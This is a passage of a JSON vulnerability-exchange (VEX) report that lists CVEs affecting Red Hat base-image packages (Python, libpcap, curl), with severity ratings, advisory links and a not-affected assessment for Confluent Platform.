          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11468"
        },
        {
          "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094"
        },
        {
          "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2"
        },
        {
          "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6"
        },
        {
          "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0"
        },
        {
          "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796"
        },
        {
          "url": "https://github.com/python/cpython/issues/143935"
        },
        {
          "url": "https://github.com/python/cpython/pull/143936"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:30:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11961",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 1.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        122,
        126
      ],
      "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer.  The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented.  If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11961"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11961"
        },
        {
          "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
        }
      ],
      "published": "2025-12-31T01:15:54+00:00",
      "updated": "2026-06-17T08:31:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14",
          "versions": [
            {
              "version": "14:1.10.0-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-12781",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        704
      ],
      "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\n\n\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\n\n\n\nThe attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python.\u00a0Users are recommended to mitigate by verifying user-controlled inputs match the base64 \nalphabet they are expecting or verify that their application would not be \naffected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-12781"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-12781"
        },
        {
          "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b"
        },
        {
          "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947"
        },
        {
          "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5"
        },
        {
          "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76"
        },
        {
          "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5"
        },
        {
          "url": "https://github.com/python/cpython/issues/125346"
        },
        {
          "url": "https://github.com/python/cpython/pull/141128"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781"
        }
      ],
      "published": "2026-01-21T20:16:04+00:00",
      "updated": "2026-06-17T08:32:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
